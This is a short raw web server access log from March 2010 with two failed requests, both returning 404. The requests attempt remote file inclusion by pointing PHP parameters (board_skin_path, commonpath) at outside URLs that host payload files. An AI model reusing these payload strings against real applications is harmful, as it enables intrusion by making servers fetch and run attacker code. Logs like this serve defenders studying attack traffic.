61.47.7.71 - - [03/Mar/2010:12:48:33 -0800] "GET /logs/access_100128.log//delete.php?board_skin_path=http://www.kamawilson.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [03/Mar/2010:12:48:33 -0800] "GET /common/db.php?commonpath=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
